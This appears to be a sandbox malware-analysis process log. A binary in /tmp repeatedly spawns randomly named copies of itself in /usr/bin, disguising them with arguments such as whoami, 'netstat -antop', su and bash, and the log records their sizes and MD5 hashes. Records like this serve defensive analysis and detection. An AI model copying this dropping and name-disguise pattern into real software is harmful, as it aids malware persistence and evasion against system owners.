                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/bbynnggifo
                                                            Arguments:/usr/bin/bbynnggifo "route -n" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:a23209c49e32830c7b61347729055c82

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/bbynnggifo
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:a23209c49e32830c7b61347729055c82

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/bbynnggifo
                                                            Arguments:/usr/bin/bbynnggifo whoami 9446
                                                            File size:625933 bytes
                                                            MD5 hash:a23209c49e32830c7b61347729055c82

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/bbynnggifo
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:a23209c49e32830c7b61347729055c82

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/bbynnggifo
                                                            Arguments:/usr/bin/bbynnggifo ifconfig 9446
                                                            File size:625933 bytes
                                                            MD5 hash:a23209c49e32830c7b61347729055c82

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/bbynnggifo
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:a23209c49e32830c7b61347729055c82

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/bbynnggifo
                                                            Arguments:/usr/bin/bbynnggifo "echo \"find\"" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:a23209c49e32830c7b61347729055c82

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/bbynnggifo
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:a23209c49e32830c7b61347729055c82

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/bbynnggifo
                                                            Arguments:/usr/bin/bbynnggifo ifconfig 9446
                                                            File size:625933 bytes
                                                            MD5 hash:a23209c49e32830c7b61347729055c82

                                                            Start time:09:52:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/bbynnggifo
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:a23209c49e32830c7b61347729055c82

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lcbdpulcrs
                                                            Arguments:/usr/bin/lcbdpulcrs "netstat -an" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:944f6236abbb80bb2bff5caad0d36e00

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lcbdpulcrs
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:944f6236abbb80bb2bff5caad0d36e00

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lcbdpulcrs
                                                            Arguments:/usr/bin/lcbdpulcrs "sleep 1" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:944f6236abbb80bb2bff5caad0d36e00

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lcbdpulcrs
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:944f6236abbb80bb2bff5caad0d36e00

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lcbdpulcrs
                                                            Arguments:/usr/bin/lcbdpulcrs who 9446
                                                            File size:625922 bytes
                                                            MD5 hash:944f6236abbb80bb2bff5caad0d36e00

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lcbdpulcrs
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:944f6236abbb80bb2bff5caad0d36e00

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lcbdpulcrs
                                                            Arguments:/usr/bin/lcbdpulcrs ls 9446
                                                            File size:625922 bytes
                                                            MD5 hash:944f6236abbb80bb2bff5caad0d36e00

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lcbdpulcrs
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:944f6236abbb80bb2bff5caad0d36e00

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lcbdpulcrs
                                                            Arguments:/usr/bin/lcbdpulcrs "ps -ef" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:944f6236abbb80bb2bff5caad0d36e00

                                                            Start time:09:52:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lcbdpulcrs
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:944f6236abbb80bb2bff5caad0d36e00

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/vrbpjcuukk
                                                            Arguments:/usr/bin/vrbpjcuukk "netstat -antop" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:c79907a39ea5c1fd2e6c1b15c7fc0ae8

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/vrbpjcuukk
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:c79907a39ea5c1fd2e6c1b15c7fc0ae8

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/vrbpjcuukk
                                                            Arguments:/usr/bin/vrbpjcuukk su 9446
                                                            File size:625933 bytes
                                                            MD5 hash:c79907a39ea5c1fd2e6c1b15c7fc0ae8

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/vrbpjcuukk
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:c79907a39ea5c1fd2e6c1b15c7fc0ae8

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/vrbpjcuukk
                                                            Arguments:/usr/bin/vrbpjcuukk "ls -la" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:c79907a39ea5c1fd2e6c1b15c7fc0ae8

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/vrbpjcuukk
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:c79907a39ea5c1fd2e6c1b15c7fc0ae8

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/vrbpjcuukk
                                                            Arguments:/usr/bin/vrbpjcuukk bash 9446
                                                            File size:625933 bytes
                                                            MD5 hash:c79907a39ea5c1fd2e6c1b15c7fc0ae8

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/vrbpjcuukk
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:c79907a39ea5c1fd2e6c1b15c7fc0ae8

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/vrbpjcuukk
                                                            Arguments:/usr/bin/vrbpjcuukk "netstat -an" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:c79907a39ea5c1fd2e6c1b15c7fc0ae8

                                                            Start time:09:52:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/vrbpjcuukk
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:c79907a39ea5c1fd2e6c1b15c7fc0ae8

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/potliirubi
                                                            Arguments:/usr/bin/potliirubi "cat resolv.conf" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:1ff01d36ef688ea454fac5af6af15593

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/potliirubi
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:1ff01d36ef688ea454fac5af6af15593

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/potliirubi
                                                            Arguments:/usr/bin/potliirubi "grep \"A\"" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:1ff01d36ef688ea454fac5af6af15593

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/potliirubi
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:1ff01d36ef688ea454fac5af6af15593

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/potliirubi
                                                            Arguments:/usr/bin/potliirubi su 9446
                                                            File size:625933 bytes
                                                            MD5 hash:1ff01d36ef688ea454fac5af6af15593

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/potliirubi
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:1ff01d36ef688ea454fac5af6af15593

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/potliirubi
                                                            Arguments:/usr/bin/potliirubi "netstat -antop" 9446
                                                            File size:625933 bytes
                                                            MD5 hash:1ff01d36ef688ea454fac5af6af15593

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/potliirubi
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:1ff01d36ef688ea454fac5af6af15593

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/potliirubi
                                                            Arguments:/usr/bin/potliirubi gnome-terminal 9446
                                                            File size:625933 bytes
                                                            MD5 hash:1ff01d36ef688ea454fac5af6af15593

                                                            Start time:09:52:15
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/potliirubi
                                                            Arguments:n/a
                                                            File size:625933 bytes
                                                            MD5 hash:1ff01d36ef688ea454fac5af6af15593

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvavyybczk
                                                            Arguments:/usr/bin/qvavyybczk whoami 9446
                                                            File size:625922 bytes
                                                            MD5 hash:813b0ad93e1e530f46c964216e20fa74

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvavyybczk
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:813b0ad93e1e530f46c964216e20fa74

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvavyybczk
                                                            Arguments:/usr/bin/qvavyybczk uptime 9446
                                                            File size:625922 bytes
                                                            MD5 hash:813b0ad93e1e530f46c964216e20fa74

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvavyybczk
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:813b0ad93e1e530f46c964216e20fa74

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvavyybczk
                                                            Arguments:/usr/bin/qvavyybczk uptime 9446
                                                            File size:625922 bytes
                                                            MD5 hash:813b0ad93e1e530f46c964216e20fa74

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvavyybczk
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:813b0ad93e1e530f46c964216e20fa74

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvavyybczk
                                                            Arguments:/usr/bin/qvavyybczk "netstat -an" 9446
                                                            File size:625922 bytes
                                                            MD5 hash:813b0ad93e1e530f46c964216e20fa74

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvavyybczk
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:813b0ad93e1e530f46c964216e20fa74

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvavyybczk
                                                            Arguments:/usr/bin/qvavyybczk who 9446
                                                            File size:625922 bytes
                                                            MD5 hash:813b0ad93e1e530f46c964216e20fa74

                                                            Start time:09:52:20
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qvavyybczk
                                                            Arguments:n/a
                                                            File size:625922 bytes
                                                            MD5 hash:813b0ad93e1e530f46c964216e20fa74